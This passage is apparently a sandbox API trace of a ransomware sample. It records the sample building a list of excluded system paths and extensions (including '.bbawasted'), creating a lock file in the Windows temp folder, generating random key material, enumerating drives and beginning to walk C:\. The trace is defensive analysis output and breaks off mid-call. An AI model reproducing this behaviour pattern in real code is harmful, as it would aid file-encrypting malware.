pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.959] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.959] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x689e3c*=0x76, cb=0xe, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.959] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.959] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.959] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.959] StrChrW (lpStart="run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0155.959] lstrlenW (lpString="run") returned 3 [0155.959] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.959] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.959] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x689e4c*=0x72, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.959] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.959] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.959] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.959] StrChrW (lpStart="var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0155.959] lstrlenW (lpString="var") returned 3 [0155.959] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.960] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.960] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x689e54*=0x76, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.960] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.960] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.960] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.960] StrChrW (lpStart="\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0155.960] lstrlenW (lpString="\\Boot") returned 5 [0155.960] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.960] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x689e5c*=0x5c, cb=0xa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.960] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.960] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.960] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.960] StrChrW (lpStart="System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0155.960] lstrlenW (lpString="System Volume Information") returned 25 [0155.960] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.960] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.960] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x689e68*=0x53, cb=0x32, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.960] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.960] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.960] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.960] StrChrW (lpStart="$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0155.960] lstrlenW (lpString="$RECYCLE.BIN") returned 12 [0155.960] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.960] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.960] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x689e9c*=0x24, cb=0x18, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.960] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.960] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.961] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.961] StrChrW (lpStart="WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0155.961] lstrlenW (lpString="WebCache") returned 8 [0155.961] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.961] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.961] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x689eb6*=0x57, cb=0x10, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.961] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.961] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.961] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.961] StrChrW (lpStart="Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0155.961] lstrlenW (lpString="Caches") returned 6 [0155.961] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.961] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.961] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x689ec8*=0x43, cb=0xc, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.961] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.961] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.961] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.961] StrChrW (lpStart="WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|AppData|ProgramData|\\Users\\All Users" [0155.961] lstrlenW (lpString="WindowsApps") returned 11 [0155.961] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.961] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.961] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x689ed6*=0x57, cb=0x16, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.961] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.961] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.961] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.961] StrChrW (lpStart="AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|ProgramData|\\Users\\All Users" [0155.961] lstrlenW (lpString="AppData") returned 7 [0155.962] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.962] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.962] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x689eee*=0x41, cb=0xe, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.962] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.962] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.962] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.962] StrChrW (lpStart="ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|\\Users\\All Users" [0155.962] lstrlenW (lpString="ProgramData") returned 11 [0155.962] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.962] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.962] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x689efe*=0x50, cb=0x16, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.962] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.962] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.962] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.962] StrChrW (lpStart="\\Users\\All Users", wMatch=0x7c) returned 0x0 [0155.962] lstrlenW (lpString="\\Users\\All Users") returned 16 [0155.962] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.962] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x689f16*=0x5c, cb=0x20, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.962] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.962] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.962] IStream:Stat (in: This=0x683c40, pstatstg=0x12ffe30, grfStatFlag=0x1 | out: pstatstg=0x12ffe30) returned 0x0 [0155.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x608) returned 0x68b718 [0155.962] IStream:RemoteSeek (in: This=0x683c40, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0155.962] ISequentialStream:RemoteRead (in: This=0x683c40, pv=0x68b718, cb=0x606, pcbRead=0x0 | out: pv=0x68b718*=0x2a, pcbRead=0x0) returned 0x0 [0155.962] IUnknown:Release (This=0x683c40) returned 0x0 [0155.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689de8 | out: hHeap=0x660000) returned 1 [0155.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x68a268 | out: hHeap=0x660000) returned 1 [0155.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66d3a8 | out: hHeap=0x660000) returned 1 [0155.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689cc0 | out: hHeap=0x660000) returned 1 [0155.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66d608 | out: hHeap=0x660000) returned 1 [0155.963] StrTrimW (in: psz="", pszTrimChars=" " | out: psz="") returned 0 [0155.963] lstrlenW (lpString="") returned 0 [0155.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2) returned 0x6822c0 [0155.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x21) returned 0x6844a8 [0155.963] CryptAcquireContextW (in: phProv=0x12ffe9c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe9c*=0x688f28) returned 1 [0158.466] CryptGenRandom (in: hProv=0x688f28, dwLen=0x21, pbBuffer=0x6844a8 | out: pbBuffer=0x6844a8) returned 1 [0158.466] CryptReleaseContext (hProv=0x688f28, dwFlags=0x0) returned 1 [0158.466] CreateFileW (lpFileName="C:\\WINDOWS\\TEMP\\lck.log" (normalized: "c:\\windows\\temp\\lck.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24c [0158.468] WriteFile (in: hFile=0x24c, lpBuffer=0x6844a8*, nNumberOfBytesToWrite=0x21, lpNumberOfBytesWritten=0x12ffeb8, lpOverlapped=0x0 | out: lpBuffer=0x6844a8*, lpNumberOfBytesWritten=0x12ffeb8*=0x21, lpOverlapped=0x0) returned 1 [0158.470] SetEndOfFile (hFile=0x24c) returned 1 [0158.470] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6844a8 | out: hHeap=0x660000) returned 1 [0158.470] _wcslwr (in: _String=0x6822b0 | out: _String="*") returned="*" [0158.470] _wcslwr (in: _String=0x68b718 | out: _String="*.bbawasted_info|*.bbawasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*") returned="*.bbawasted_info|*.bbawasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*" [0158.470] GetLogicalDriveStringsW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x5 [0158.471] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x684718 [0158.471] GetLogicalDriveStringsW (in: nBufferLength=0x5, lpBuffer=0x68472e | out: lpBuffer="C:\\") returned 0x4 [0158.471] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa) returned 0x685b68 [0158.471] lstrlenW (lpString="C:\\") returned 3 [0158.471] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x685b68 | out: hHeap=0x660000) returned 1 [0158.471] lstrlenW (lpString="C:\\") returned 3 [0158.471] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.471] lstrlenW (lpString="C:\\") returned 3 [0158.471] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.471] QueryDosDeviceW (in: lpDeviceName="C:", lpTargetPath=0x12ffe80, ucchMax=0x18 | out: lpTargetPath="\\Device\\HarddiskVolume1") returned 0x0 [0158.472] lstrlenW (lpString="C:\\") returned 3 [0158.472] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.472] lstrlenW (lpString="C:\\") returned 3 [0158.472] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.472] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x44) returned 0x67c670 [0158.472] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x274 [0158.472] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x404895, lpParameter=0x67c670, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x278 [0158.473] StrChrW (lpStart="C:\\", wMatch=0x7c) returned 0x0 [0158.473] lstrlenW (lpString="C:\\") returned 3 [0158.473] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xfffe) returned 0x68c530 [0158.474] lstrlenW (lpString="*") returned 1 [0158.474] lstrlenW (lpString="*.bbawasted_info|*.bbawasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*") returned 771 [0158.474] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60c) returned 0x68a268 [0158.474] lstrcpyW (in: lpString1=0x68a26c, lpString2="*.bbawasted_info|*.bbawasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*" | out: lpString1="*.bbawasted_info|*.bbawasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*") returned="*.bbawasted_info|*.bbawasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*" [0158.474] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69c538 [0158.474] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x69c538 | out: lpFindFileData=0x69c538*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0x6780f0 [0158.474] lstrlenW (lpString="$GetCurrent") returned 11 [0158.479] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69c790 [0158.479] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\*", lpFindFileData=0x69c790 | out: lpFindFileData=0x69c790*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x678130 [0158.481] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69c790 | out: lpFindFileData=0x69c790*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.481] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.481] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69c790 | out: 